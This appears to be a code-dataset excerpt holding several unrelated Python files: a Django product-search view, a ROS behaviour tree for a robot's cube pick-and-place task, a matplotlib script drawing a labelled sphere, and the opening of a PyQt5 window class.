'product-detail.html', context)\n\ndef productSearch(request):\n context = {\n 'appID': settings.ALGOLIA['APPLICATION_ID'],\n 'searchKey': settings.ALGOLIA['API_KEY'],\n 'indexName': 'products'\n }\n return render(request, 'search.html', context)\n\n# # function to upload data to algolia\n# def fetch_data_from_database(request):\n# products = session.query(Products).all()\n# index.save_objects(products, {'autoGenerateObjectIDIfNotExist': True})\n# return render(request, 'demo.html', {'products':products })\n\n\n\n\n# convert sqlalchemy object to list of dicts\n# productList = []\n # for product in products:\n # print(product.name)\n # _product = {}\n # _product['name'] = str(product.name)\n # _product['model_number'] = str(product.model_number)\n # _product['character'] = str(product.character)\n # _product['brand'] = str(product.brand)\n # _product['description'] = str(product.description)\n # productList.append(_product)\n\n# index.save_objects(productList, {'autoGenerateObjectIDIfNotExist': True})\n\n# Function to fill data\n# def is_empty():\n# return len(session.query(Products).all()) <= 0\n#\n# def populate():\n# new_products = [Products('something', '12345', 'batman', 'apple', 'The best product'),\n# Products('something else', '45678', 'spider-Waman', 'Next', '9 year old 
# session.add_all(new_products)\n# session.commit()\n\n\n# Function to add data\n# def runseeder(request):\n# for entry in range(1000):\n# fake_name = fakegen.name()\n# fake_model = fakegen.isbn10(separator=\"-\")\n# fake_character = fakegen.first_name()\n# fake_company = fakegen.company()\n# fake_description = fakegen.sentence(nb_words=15, variable_nb_words=True, ext_word_list=None)\n\n# product = Products(name=fake_name,\n# model_number=fake_model,\n# character=fake_character,\n# brand=fake_company,\n# description=fake_description,\n# )\n# session.add(product)\n# session.commit()\n\n# return render(request, 'demo.html')\n","sub_path":"products/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"260241032","text":"#!/usr/bin/env python\nimport py_trees as pt, py_trees_ros as ptr, rospy\nfrom behaviours_student import *\nfrom reactive_sequence import RSequence\n\nimport math\nimport actionlib\nfrom geometry_msgs.msg import PoseStamped, Pose, PoseWithCovarianceStamped \nfrom move_base_msgs.msg import MoveBaseAction, MoveBaseGoal, MoveBaseActionGoal\nfrom std_srvs.srv import Empty, SetBool, SetBoolRequest \nfrom gazebo_msgs.msg import ModelState\nfrom gazebo_msgs.srv import SetModelState\nfrom std_msgs.msg import Bool\n\n\nclass BehaviourTree(ptr.trees.BehaviourTree):\n\tdef __init__(self):\n\t\tself.picked_up_cube_topic_name = rospy.get_name() + \"/picked_up_cube_topic\"\n\t\tself.place_pose_topic = rospy.get_param(rospy.get_name() + '/place_pose_topic')\n\t\tself.pickup_pose_topic = rospy.get_param(rospy.get_name() + '/pick_pose_topic')\n\n\t\trospy.loginfo(\"Initialising behaviour tree\")\n\n\t\tb0 = TuckArm()\n\t\tb1 = activate_localizator() # activate global localization\n\t\tb2 = pt.composites.Selector(\n\t\t\tname=\"Rotate for localization\",\n\t\t\tchildren=[counter(70, \"Rotated?\"), go(\"Rotate!\", 0, 1)]) # rotate for better localization\n\t\tb22 = respawn_cube()\n\t\tb3 = Navigate(self.pickup_pose_topic)\n\t\t# pickup\n\t\tb4 = LowerHead(\"Lower head!\", \"down\")\n\t\tb5 = PickCube(self.picked_up_cube_topic_name)\n\t\tb6 = LowerHead(\"Raise head!\", \"up\")\n\n\t\tb7 = Navigate(self.place_pose_topic)\n\t\t# place\n\t\tb8 = LowerHead(\"Lower head!\", \"down\")\n\t\tb9 = PlaceCube()\n\t\tb10 = LowerHead(\"Raise head!\", \"up\")\n\t\t# become the tree\n\t\ttree = RSequence(name=\"Main sequence\", children=[b0, b1, b2, b22, b3, b4, b5, b6, b7, b8, b9, b10])\n\t\tsuper(BehaviourTree, self).__init__(tree)\n\n\t\t# execute the behaviour tree\n\t\trospy.sleep(5)\n\t\tself.setup(timeout=10000)\n\t\twhile not rospy.is_shutdown(): self.tick_tock(1)\t\n\n\n### BEHAVIOURS\n\n#### SERVICE global_localization\nclass activate_localizator(pt.behaviour.Behaviour):\n\n\tdef __init__(self):\n\n\t\t# server\n\t\trospy.wait_for_service('/global_localization', timeout=30)\n\t\tself.localize_srv = rospy.ServiceProxy('/global_localization', Empty)\n\n\t\t# execution checker\n\t\tself.activated = False\n\n\t\t# become a behaviour\n\t\tsuper(activate_localizator, self).__init__(\"Activate localizator!\")\n\n\tdef update(self):\n\n\t\t# call the global localization service if we haven't already\n\t\tif not self.activated:\n\n\t\t\t# command\n\t\t\tx = self.localize_srv()\n\t\t\tprint(x)\n\t\t\tself.activated = True\n\n\t\t\t# tell the tree you're done\n\t\t\treturn pt.common.Status.SUCCESS\n\n\t\t# react to outcome\n\t\telse: return pt.common.Status.SUCCESS\n\n\n#### ACTION SERVICE move_base
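# --- Illustrative sketch (not part of the original script): the behaviour
# skeleton every class below follows -- do the one-shot work, report RUNNING
# while busy and SUCCESS afterwards. The class and name here are hypothetical.
import py_trees as pt

class CallOnce(pt.behaviour.Behaviour):
    def __init__(self, name="call once"):
        super(CallOnce, self).__init__(name)
        self.done = False

    def update(self):
        if not self.done:
            self.done = True  # one-shot work (service call, goal, ...) goes here
            return pt.common.Status.RUNNING
        return pt.common.Status.SUCCESS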
class Navigate(pt.behaviour.Behaviour):\n\n\tdef __init__(self, pose_topic):\n\t\t\n\t\tself.pose_topic = pose_topic\n\t\tself.pose = None\n\t\t# Set up action client (SimpleActionClient lives in the actionlib package)\n\t\tself.move_base_action = actionlib.SimpleActionClient(\"/move_base\", MoveBaseAction)\n\n\t\t# personal goal setting\n\t\tself.goal = MoveBaseGoal()\n\n\t\t# execution checker\n\t\tself.have_pose = False\n\t\tself.sent_goal = False\n\t\tself.finished = False\n\n\t\t# become a behaviour\n\t\tsuper(Navigate, self).__init__(\"Navigate!\")\n\n\tdef feedback_cb(self, feedback):\n\t\tposition = feedback.base_position.pose.position\n\t\torientation = feedback.base_position.pose.orientation\n\t\tdelta_pos = math.hypot(self.pose.pose.position.x - position.x, self.pose.pose.position.y - position.y)\n\t\tdelta_rot = math.hypot(self.pose.pose.orientation.z - orientation.z, self.pose.pose.orientation.w - orientation.w)\n\t\tif delta_pos < 0.09 and delta_rot < 0.05:\n\t\t\tself.finished = True\n\t\t\tself.move_base_action.cancel_all_goals()\n\t\telse:\n\t\t\tself.finished = False\n\t\t\t# rospy.loginfo(\"Position: %s. Orientation: %s\", delta_pos, delta_rot )\n\n\tdef done_cb(self, state, feedback):\n\t\tself.finished = True\n\n\n\tdef update(self):\n\n\t\t# already reached the goal\n\t\tif self.finished: \n\t\t\treturn pt.common.Status.SUCCESS\n\t\t\n\t\t# command to get the pose where to navigate to\n\t\telif not self.have_pose:\n\t\t\t# Set up subscriber to get the pickup or place pose\n\t\t\tself.pose = rospy.wait_for_message(self.pose_topic, PoseStamped)\n\t\t\tself.have_pose = True\n\t\t\treturn pt.common.Status.RUNNING\n\n\t\telif not self.sent_goal:\n\t\t\t\n\t\t\t# send the goal\n\t\t\tself.goal = MoveBaseGoal(self.pose)\n\t\t\t# self.goal.target_pose = PoseStamped( self.pose)\n\t\t\t# self.goal.goal.target_pose = self.pose\n\t\t\tself.move_base_action.send_goal(self.goal, feedback_cb=self.feedback_cb, done_cb=self.done_cb)\n\t\t\tself.sent_goal = True\n\n\t\t\t# tell the tree you're running\n\t\t\treturn pt.common.Status.RUNNING\n\n\t\t# if I'm still trying :|\n\t\telse:\n\t\t\treturn pt.common.Status.RUNNING\n\t\t\t\n### SIMPLE Services\nclass TuckArm(pt.behaviour.Behaviour): # put arm in home position\n\n\tdef __init__(self):\n\n\t\t# Set up action client\n\t\tself.play_motion_ac = actionlib.SimpleActionClient(\"/play_motion\", PlayMotionAction)\n\n\t\t# personal goal setting\n\t\tself.goal = PlayMotionGoal()\n\t\tself.goal.motion_name = 'home'\n\t\tself.goal.skip_planning = True\n\n\t\t# execution checker\n\t\tself.sent_goal = False\n\t\tself.finished = False\n\n\t\t# become a behaviour\n\t\tsuper(TuckArm, self).__init__(\"Tuck arm!\")\n\n\tdef update(self):\n\n\t\t# already tucked the arm\n\t\tif self.finished: \n\t\t\treturn pt.common.Status.SUCCESS\n\t\t\n\t\t# command to tuck arm if haven't already\n\t\telif not self.sent_goal:\n\n\t\t\t# send the goal\n\t\t\tself.play_motion_ac.send_goal(self.goal)\n\t\t\tself.sent_goal = True\n\n\t\t\t# tell the tree you're running\n\t\t\treturn pt.common.Status.RUNNING\n\n\t\t# if I was successful! :)))))))))
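# --- Illustrative sketch (not part of the original script): the actionlib
# client pattern Navigate relies on, assuming a move_base action server is
# running; both callbacks here are stand-ins.
import actionlib
import rospy
from move_base_msgs.msg import MoveBaseAction, MoveBaseGoal

def _feedback(fb):
    pass  # called periodically with the robot's current base position

def _done(state, result):
    pass  # called once when the goal finishes or is cancelled

client = actionlib.SimpleActionClient("/move_base", MoveBaseAction)
client.wait_for_server()  # block until the action server is available
client.send_goal(MoveBaseGoal(), feedback_cb=_feedback, done_cb=_done)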
\t\telif self.play_motion_ac.get_result():\n\n\t\t\t# then I'm finished!\n\t\t\tself.finished = True\n\t\t\treturn pt.common.Status.SUCCESS\n\n\t\t# if I'm still trying :|\n\t\telse:\n\t\t\treturn pt.common.Status.RUNNING\n\n\nclass Running(pt.behaviour.Behaviour):\n\tdef __init__(self):\n\t\tsuper(Running, self).__init__(name=\"running\")\n\n\tdef update(self):\n\t\treturn pt.common.Status.RUNNING\n\n\nclass PickCube(pt.behaviour.Behaviour):\n\tdef __init__(self, picked_up_cube_topic_name):\n\t\tself.pickService = rospy.get_param(rospy.get_name() + '/pick_srv')\n\n\t\tself.pickProxy = rospy.ServiceProxy(self.pickService, SetBool)\n\t\tself.pub = rospy.Publisher(picked_up_cube_topic_name, Bool, queue_size=10)\n\t\t# execution checker\n\t\tself.called_service = False\n\t\tself.finished = False\n\t\t\n\t\tsuper(PickCube, self).__init__(\"Pick Up Cube\")\n\tdef update(self):\n\t\t# call the pick service if we haven't already\n\t\tif not self.called_service:\n\n\t\t\t# command\n\t\t\tself.result = self.pickProxy(True)\n\t\t\trospy.loginfo(\"result of the pick operation \" + str(self.result.success))\n\t\t\tself.called_service = True\n\n\t\t\t# tell the tree you're running\n\t\t\treturn pt.common.Status.RUNNING\n\n\t\t# react to outcome\n\t\telse: \n\t\t\t#self.called_service = False\n\t\t\t#sb = SetBool()\n\t\t\tif self.result.success:\n\t\t\t\t#sb.success = True\n\t\t\t\tself.pub.publish(True)\n\t\t\t\treturn pt.common.Status.SUCCESS\n\t\t\telse:\n\t\t\t\t#sb.success = False\n\t\t\t\tself.pub.publish(False)\n\t\t\t\treturn pt.common.Status.FAILURE\n\n\nclass respawn_cube(pt.behaviour.Behaviour):\n\n\tdef __init__(self):\n\n\t\t# server\n\t\trospy.wait_for_service('/gazebo/set_model_state', timeout=30)\n\t\tself.respawn_cube_srv = rospy.ServiceProxy('/gazebo/set_model_state', SetModelState)\n\n\t\t# execution checker\n\t\tself.activated = False\n\n\t\t# become a behaviour\n\t\tsuper(respawn_cube, self).__init__(\"Respawn cube!\")\n\n\tdef update(self):\n\n\t\t# respawn the cube if we haven't already\n\t\tif not self.activated:\n\t\t\trespawn_cube_srv_name = '/gazebo/set_model_state'\n\t\t\t\n\t\t\trospy.wait_for_service(respawn_cube_srv_name, timeout=30)\n\t\t\tdata = { 'model_name': 'aruco_cube', 'pose': { 'position': { 'x': -1.130530, 'y': -6.653650, 'z': 0.86250 }, 'orientation': {'x': 0, 'y': 0, 'z': 0, 'w': 1 } }, 'twist': { 'linear': {'x': 0 , 'y': 0, 'z': 0 } , 'angular': { 'x': 0, 'y': 0, 'z': 0 } } , 'reference_frame': 'map' }\n\t\t\tmsg = ModelState()\n\t\t\tmsg.model_name = data['model_name']\n\t\t\tpose = Pose()\n\t\t\tpose.position.x = data['pose']['position']['x']\n\t\t\tpose.position.y = data['pose']['position']['y']\n\t\t\tpose.position.z = data['pose']['position']['z']\n\t\t\t# identity quaternion (x, y and z default to 0); without this the orientation is invalid\n\t\t\tpose.orientation.w = data['pose']['orientation']['w']\n\t\t\tmsg.pose = pose\n\t\t\tmsg.reference_frame = data['reference_frame']\n\t\t\tself.respawn_cube_srv(msg)\n\n\t\t\t# tell the tree you're done\n\t\t\treturn pt.common.Status.SUCCESS\n\n\t\t# react to outcome\n\t\telse: return pt.common.Status.SUCCESS\n\t\t\n\n\nclass PlaceCube(pt.behaviour.Behaviour):\n\tdef __init__(self):\n\t\tself.placeService = rospy.get_param(rospy.get_name() + '/place_srv')\n\n\t\tself.placeProxy = rospy.ServiceProxy(self.placeService, SetBool)\n\n\t\t# execution checker\n\t\tself.called_service = False\n\t\tself.finished = False\n\t\t\n\t\tsuper(PlaceCube, self).__init__(\"Place Cube\")\n\tdef update(self):\n\t\t# call the place service if we haven't already\n\t\tif not self.called_service:\n\n\t\t\t# command\n\t\t\tself.result = self.placeProxy(True)\n\t\t\trospy.loginfo(\"result of the place operation \" + 
str(self.result.success))\n\t\t\tself.called_service = True\n\n\t\t\t# tell the tree you're running\n\t\t\treturn pt.common.Status.RUNNING\n\n\t\t# react to outcome\n\t\telse: return pt.common.Status.SUCCESS if self.result.success else pt.common.Status.FAILURE\n\n\nclass LowerHead(pt.behaviour.Behaviour):\n\n\tdef __init__(self, name, type):\n\n\t\t# server\n\t\tmv_head_srv_nm = rospy.get_param(rospy.get_name() + '/move_head_srv')\n\t\tself.move_head_srv = rospy.ServiceProxy(mv_head_srv_nm, MoveHead)\n\t\trospy.wait_for_service(mv_head_srv_nm, timeout=30)\n\t\tself.type = type\n\t\t# execution checker\n\t\tself.tried = False\n\t\tself.tucked = False\n\n\t\t# become a behaviour\n\t\tsuper(LowerHead, self).__init__(name)\n\n\tdef update(self):\n\n\t\t# try to move the head if we haven't already\n\t\tif not self.tried:\n\n\t\t\t# command\n\t\t\tself.move_head_req = self.move_head_srv(self.type)\n\t\t\tself.tried = True\n\n\t\t\t# tell the tree you're running\n\t\t\treturn pt.common.Status.RUNNING\n\n\t\t# react to outcome\n\t\telse: return pt.common.Status.SUCCESS if self.move_head_req.success else pt.common.Status.FAILURE\n\n\n\t### CONDITIONs\n\n### reached pick position\nclass Pick_Pos_Condition(pt.behaviour.Behaviour):\n\tdef callback(self, pose):\n\t\tself.position = pose.pose\n\n\tdef __init__(self, pick_pose_topic):\n\t\tself.pick_pose_topic = pick_pose_topic\n\t\tself.amcl = '/amcl_pose'\n\t\trospy.Subscriber(self.amcl, PoseWithCovarianceStamped, self.callback)\n\t\tself.position = PoseStamped()\n\t\tsuper(Pick_Pos_Condition, self).__init__(\"Reached pick position?\")\n\n\tdef update(self):\n\t\tself.pose = rospy.wait_for_message(self.pick_pose_topic, PoseStamped)\n\t\tposition = self.position.pose.position\n\t\torientation = self.position.pose.orientation\n\t\tdelta_pos = math.hypot(self.pose.pose.position.x - position.x, self.pose.pose.position.y - position.y)\n\t\tdelta_rot = math.hypot(self.pose.pose.orientation.z - orientation.z, self.pose.pose.orientation.w - orientation.w)\n\t\tif delta_pos < 0.09 and delta_rot < 0.05:\n\t\t\treturn pt.common.Status.SUCCESS\n\t\telse:\n\t\t\treturn pt.common.Status.FAILURE\n\n### reached place position\nclass Place_Pos_Condition(pt.behaviour.Behaviour):\n\tdef callback(self, pose):\n\t\tself.position = pose.pose\n\n\tdef __init__(self, place_pos_topic):\n\t\tself.place_pos_topic = place_pos_topic\n\t\tself.amcl = '/amcl_pose'\n\t\trospy.Subscriber(self.amcl, PoseWithCovarianceStamped, self.callback)\n\t\tself.position = PoseStamped()\n\t\tsuper(Place_Pos_Condition, self).__init__(\"Reached place position?\")\n\n\tdef update(self):\n\t\tself.pose = rospy.wait_for_message(self.place_pos_topic, PoseStamped)\n\t\tposition = self.position.pose.position\n\t\torientation = self.position.pose.orientation\n\t\tdelta_pos = math.hypot(self.pose.pose.position.x - position.x, self.pose.pose.position.y - position.y)\n\t\tdelta_rot = math.hypot(self.pose.pose.orientation.z - orientation.z, self.pose.pose.orientation.w - orientation.w)\n\t\tif delta_pos < 0.09 and delta_rot < 0.05:\n\t\t\treturn pt.common.Status.SUCCESS\n\t\telse:\n\t\t\treturn pt.common.Status.FAILURE\n\n### cube picked\nclass cube_picked(pt.behaviour.Behaviour):\n\tdef callback(self, setBool):\n\t\tself.cube_picked = setBool.data # keep the boolean payload, not the Bool message itself\n\n\tdef __init__(self, cube_picked_topic_name):\n\t\tself.cube_picked = False\n\t\t# no rospy.init_node() here: the main script already initialises the node,\n\t\t# and calling init_node a second time raises an exception\n\n\t\trospy.Subscriber(cube_picked_topic_name, Bool, self.callback)\n\t\tsuper(cube_picked, self).__init__(\"Cube picked?\")\n\n\tdef update(self):\n\t\tif self.cube_picked:\n\t\t\treturn pt.common.Status.SUCCESS\n\t\telse:\n\t\t\treturn pt.common.Status.FAILURE\n\n\n\n\n\n\n\nif __name__ 
== \"__main__\":\n\n\n\trospy.init_node('main_state_machine')\n\ttry:\n\t\tBehaviourTree()\n\texcept rospy.ROSInterruptException:\n\t\tpass\n\n\trospy.spin()","sub_path":"scripts/behaviour_trees/bt_students.py","file_name":"bt_students.py","file_ext":"py","file_size_in_byte":11851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"620439885","text":"import texfig\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm, colors\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib.patches import FancyArrowPatch\nfrom mpl_toolkits.mplot3d import proj3d\nimport numpy as np\nimport pylab\n\nclass Arrow3D(FancyArrowPatch):\n def __init__(self, xs, ys, zs, *args, **kwargs):\n FancyArrowPatch.__init__(self, (0,0), (0,0), *args, **kwargs)\n self._verts3d = xs, ys, zs\n\n def draw(self, renderer):\n xs3d, ys3d, zs3d = self._verts3d\n xs, ys, zs = proj3d.proj_transform(xs3d, ys3d, zs3d, renderer.M)\n self.set_positions((xs[0],ys[0]),(xs[1],ys[1]))\n FancyArrowPatch.draw(self, renderer)\n\ndef annotate3d(ax, s, *args, **kwargs):\n '''add anotation text s to to Axes3d ax'''\n\n tag = Annotation3D(s, *args, **kwargs)\n ax.add_artist(tag)\n\n\nscalefactor = 1 #1 para qualidade normal, 5 para compilação rápida\nazim_init = -50 # ângulo azimutal inicial\nelev_init = 20 # angulo elev inicial\nfontsize = '14'\n\n# Create a sphere\nr = 2\npi = np.pi\ncos = np.cos\nsin = np.sin\nepsilon = 0.04*pi\n\n#Esfera\nphi, theta = np.mgrid[0.0:pi:(scalefactor**(-1))*50j, 0.0:2.0*pi:(scalefactor**(-1))*50j]\nx = r*sin(phi)*cos(theta)\ny = r*sin(phi)*sin(theta)\nz = r*cos(phi)\n\n#Pontos\nphi_0 = 0.4*pi\ntheta_0 = 0.4*pi\nP_0 = (r*sin(phi_0)*cos(theta_0), r*sin(phi_0)*sin(theta_0), r*cos(phi_0))\nphii = [0, phi_0, pi]\nO_0 = (r*sin(phi_0-epsilon)*cos(theta_0-epsilon), r*sin(phi_0-epsilon)*sin(theta_0-epsilon), r*cos(phi_0-epsilon))\nQ_0 = (r*sin(phi_0+epsilon)*cos(theta_0-epsilon), r*sin(phi_0+epsilon)*sin(theta_0-epsilon), r*cos(phi_0+epsilon))\nR_0 = (r*sin(phi_0+epsilon)*cos(theta_0+epsilon), r*sin(phi_0+epsilon)*sin(theta_0+epsilon), r*cos(phi_0+epsilon))\nS_0 = (r*sin(phi_0-epsilon)*cos(theta_0+epsilon), r*sin(phi_0-epsilon)*sin(theta_0+epsilon), r*cos(phi_0-epsilon))\n\nxx_0 = [O_0[0], Q_0[0], R_0[0], S_0[0]]\nyy_0 = [O_0[1], Q_0[1], R_0[1], S_0[1]]\nzz_0 = [O_0[2], Q_0[2], R_0[2], S_0[2]]\n\n\n\nxx = r*sin(phii)*cos(theta_0)\nyy = r*sin(phii)*sin(theta_0)\nzz = r*cos(phii)\n\n#Curvas\nphi_1 = np.linspace(0, pi, int(50/scalefactor))\ntheta_1 = [theta_0+epsilon, theta_0-epsilon]\nphi_2 = [phi_0 + epsilon, phi_0 - epsilon]\ntheta_2 = np.linspace(-pi/2 - azim_init/180*pi, pi/2 - azim_init/180*pi, int(50/scalefactor))\ntheta_22 = np.linspace(-pi, pi, int(50/scalefactor))\n\n\nx_11 = r*sin(phi_1)*cos(theta_1[0])\ny_11 = r*sin(phi_1)*sin(theta_1[0])\nz_11 = r*cos(phi_1)\nx_21 = r*sin(phi_2[0])*cos(theta_2)\ny_21 = r*sin(phi_2[0])*sin(theta_2)\nz_21 = r*cos(phi_2[0])\nx_12 = r*sin(phi_1)*cos(theta_1[1])\ny_12 = r*sin(phi_1)*sin(theta_1[1])\nz_12 = r*cos(phi_1)\nx_22 = r*sin(phi_2[1])*cos(theta_2)\ny_22 = r*sin(phi_2[1])*sin(theta_2)\nz_22 = r*cos(phi_2[1])\nxx_21 = r*sin(phi_2[0])*cos(theta_22)\nyy_21 = r*sin(phi_2[0])*sin(theta_22)\nzz_21 = r*cos(phi_2[0])\nxx_22 = r*sin(phi_2[1])*cos(theta_22)\nyy_22 = r*sin(phi_2[1])*sin(theta_22)\nzz_22 = r*cos(phi_2[1])\n\n\n\n#Ajustes da Imagem\nfig = texfig.figure()\nax = fig.add_subplot(111, projection='3d')\nax.view_init(azim=-azim_init, elev=elev_init) # vista da imagem\nfig.set_size_inches(4, 4, 4)\ncut = 
0.65\nax.set_xlim([-r*cut,r*cut])\nax.set_ylim([-r*cut,r*cut])\nax.set_zlim([-r*cut,r*cut])\n\n# Render\nax.plot_surface(\n x, y, z, rstride=1, cstride=1, color='c', alpha=0.15, linewidth=0, zorder=0) # sphere\n\nax.scatter(xx, yy, zz, color=\"darkblue\", s=20, zorder=1) # points P + poles\nax.scatter(xx_0, yy_0, zz_0, color=\"darkblue\", s=20, zorder=1) # points O-Q-R-S\n\nplt.plot(x_11, y_11, z_11, color=\"darkblue\", alpha=0.8, zorder=0)\nplt.plot(x_21, y_21, z_21, color=\"darkblue\", alpha=0.8, zorder=0)\nplt.plot(x_12, y_12, z_12, color=\"darkblue\", alpha=0.8, zorder=0)\nplt.plot(x_22, y_22, z_22, color=\"darkblue\", alpha=0.8, zorder=0)\nplt.plot(xx_21, yy_21, zz_21, color=\"darkblue\", alpha=0.2, zorder=0, ls='--')\nplt.plot(xx_22, yy_22, zz_22, color=\"darkblue\", alpha=0.2, zorder=0, ls='--')\n\n# Arrows\nstep_arrow = 0.007\n # O Q\nx_seta, y_seta, z_seta = [0.5*(Q_0[0]+O_0[0]), 0.5*(Q_0[1]+O_0[1]), 0.5*(Q_0[2]+O_0[2])]\nx2, y2, _ = proj3d.proj_transform(x_seta, y_seta, z_seta, ax.get_proj())\nplt.arrow(x2, y2, 0.05*step_arrow, -0.5*step_arrow,\nshape='full', length_includes_head=True, head_width=.0035, color='darkblue', zorder=0, alpha=0.8\n)\n # Q R\nx_seta, y_seta, z_seta = [0.5*(Q_0[0]+R_0[0]), 0.5*(Q_0[1]+R_0[1]), 0.5*(Q_0[2]+R_0[2])]\nx2, y2, _ = proj3d.proj_transform(x_seta, y_seta, z_seta, ax.get_proj())\nplt.arrow(x2, y2, +0.45*step_arrow, +0.02*step_arrow,\nshape='full', length_includes_head=True, head_width=.0035, color='darkblue', zorder=0, alpha=0.8\n)\n # R S\nx_seta, y_seta, z_seta = [0.5*(S_0[0]+R_0[0]), 0.5*(S_0[1]+R_0[1]), 0.5*(S_0[2]+R_0[2])]\nx2, y2, _ = proj3d.proj_transform(x_seta, y_seta, z_seta, ax.get_proj())\nplt.arrow(x2, y2, -0.05*step_arrow, +0.5*step_arrow,\nshape='full', length_includes_head=True, head_width=.0035, color='darkblue', zorder=0, alpha=0.8\n)\n # S O\nx_seta, y_seta, z_seta = [0.5*(S_0[0]+O_0[0]), 0.5*(S_0[1]+O_0[1]), 0.5*(S_0[2]+O_0[2])]\nx2, y2, _ = proj3d.proj_transform(x_seta, y_seta, z_seta, ax.get_proj())\nplt.arrow(x2, y2, -0.45*step_arrow, -0.02*step_arrow,\nshape='full', length_includes_head=True, head_width=.0035, color='darkblue', zorder=0, alpha=0.8\n)\n\n\n# Labels\n\nax.text(P_0[0]+0.1, P_0[1]-0.1, P_0[2]+0.02, r\"$P$\", color='darkblue', size=fontsize) # P\nax.text(S_0[0]+0.1, S_0[1]+0.2, S_0[2]+0.15, r\"$S$\", color='darkblue', size=fontsize) # S\nax.text(O_0[0]+0.2, O_0[1]-0.15, O_0[2]+0.05, r\"$O$\", color='darkblue', size=fontsize) # O\nax.text(Q_0[0]+0.2, Q_0[1]-0.2, Q_0[2]-0.32, r\"$Q$\", color='darkblue', size=fontsize) # Q\nax.text(R_0[0]+0.12, R_0[1]+0.2, R_0[2]-0.2, r\"$R$\", color='darkblue', size=fontsize) # R\n\n\n# phi-minus\nphi_leg = 0.2*pi\ntheta_leg = theta_0 - epsilon\nx_leg = r*sin(phi_leg)*cos(theta_leg)\ny_leg = r*sin(phi_leg)*sin(theta_leg)\nz_leg = r*cos(phi_leg)\nx2, y2, _ = proj3d.proj_transform(x_leg, y_leg, z_leg, ax.get_proj())\nlabel = pylab.annotate(\n r\"$ \\phi=\\phi_0-\\varepsilon$\", color='darkblue',\n xy=(x2, y2), xytext=(-15,10), size=fontsize,\n textcoords='offset points', ha='right', va='bottom',\n arrowprops = dict(arrowstyle = '->', connectionstyle = 'arc3,rad=0', color='darkblue')\n)\n# phi-plus\nphi_leg = 0.7*pi\ntheta_leg = theta_0 + epsilon\nx_leg = r*sin(phi_leg)*cos(theta_leg)\ny_leg = r*sin(phi_leg)*sin(theta_leg)\nz_leg = r*cos(phi_leg)\nx2, y2, _ = proj3d.proj_transform(x_leg, y_leg, z_leg, ax.get_proj())\nlabel = pylab.annotate(\n r\"$ \\phi=\\phi_0+\\varepsilon$\", color='darkblue',\n xy=(x2, y2), xytext=(+75,-30), size=fontsize,\n textcoords='offset points', 
ha='right', va='bottom',\n arrowprops = dict(arrowstyle = '->', connectionstyle = 'arc3,rad=0', color='darkblue')\n)\n# theta-plus\nphi_leg = phi_0 + epsilon\ntheta_leg = 0.1*pi\nx_leg = r*sin(phi_leg)*cos(theta_leg)\ny_leg = r*sin(phi_leg)*sin(theta_leg)\nz_leg = r*cos(phi_leg)\nx2, y2, _ = proj3d.proj_transform(x_leg, y_leg, z_leg, ax.get_proj())\nlabel = pylab.annotate(\n r\"$ \\theta=\\theta_0+\\varepsilon$\", color='darkblue',\n xy=(x2, y2), xytext=(-5,-45), size=fontsize,\n textcoords='offset points', ha='right', va='bottom',\n arrowprops = dict(arrowstyle = '->', connectionstyle = 'arc3,rad=0', color='darkblue')\n)\n\n# theta-minus\nphi_leg = phi_0 - epsilon\ntheta_leg = 0.1*pi\nx_leg = r*sin(phi_leg)*cos(theta_leg)\ny_leg = r*sin(phi_leg)*sin(theta_leg)\nz_leg = r*cos(phi_leg)\nx2, y2, _ = proj3d.proj_transform(x_leg, y_leg, z_leg, ax.get_proj())\nlabel = pylab.annotate(\n r\"$ \\theta=\\theta_0-\\varepsilon$\", color='darkblue',\n xy=(x2, y2), xytext=(-5,+35), size=fontsize,\n textcoords='offset points', ha='right', va='bottom',\n arrowprops = dict(arrowstyle = '->', connectionstyle = 'arc3,rad=0', color='darkblue')\n)\n\n\n\n\n# Plot\nplt.tight_layout()\nfig.set_size_inches(4, 4, 4)\nplt.axis('off')\ntexfig.savefig('EsferaLoop', transparent=True)","sub_path":"figuras/esfera_loop_pgf.py","file_name":"esfera_loop_pgf.py","file_ext":"py","file_size_in_byte":7832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"231685718","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport random\nimport time\nimport re\nfrom glob import glob\nfrom pygame import mixer\nimport winsound\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtCore import QThread, pyqtSignal, QObject\n# from selenium.webdriver.support.ui import WebDriverWait\n# from selenium.webdriver.support.expected_conditions import staleness_of\nfrom bs4 import BeautifulSoup\nfrom openpyxl import load_workbook\nfrom openpyxl.styles import Font, colors\nfrom selenium import webdriver\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.common.exceptions import WebDriverException\nfrom selenium.common import exceptions\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\n\n\n\nclass UiMainWindow(QtWidgets.QMainWindow):\n def __init__(self, dim):\n super().__init__()\n ####### Useful attributes #############\n self.dim = dim # screen dimensions\n self.setObjectName(\"main_window\")\n width = 452\n self.setGeometry(0, 38, width, self.dim.height() - 90)\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(\"Adentis_icon.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n # icon file in the application folder\n self.setWindowIcon(icon)\n self.setStyleSheet(\n \"background-color: qlineargradient(spread:reflect, x1:0.513, y1:0, x2:0.517, y2:0.511, \"\n \"stop:0 rgba(0, 158, 255, 255), stop:0.283582 rgba(255, 255, 255, 255));\")\n\n self.central_widget = QtWidgets.QWidget(self)\n self.central_widget.setObjectName(\"central_widget\")\n self.setCentralWidget(self.central_widget)\n\n ############# Main layout grid ##############\n self.gridLayout = QtWidgets.QGridLayout(self.central_widget)\n self.gridLayout.setContentsMargins(10, 35, 10, 10)\n self.gridLayout.setObjectName(\"gridLayout\")\n\n ############## statusbar ################\n self.status_bar = QtWidgets.QStatusBar(self.central_widget)\n
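# --- Illustrative sketch (not part of the original file): the
# QGridLayout.addWidget(widget, row, column, rowSpan, columnSpan) signature
# used throughout __init__ below; the widgets here are hypothetical.
from PyQt5 import QtWidgets

app = QtWidgets.QApplication([])
window = QtWidgets.QWidget()
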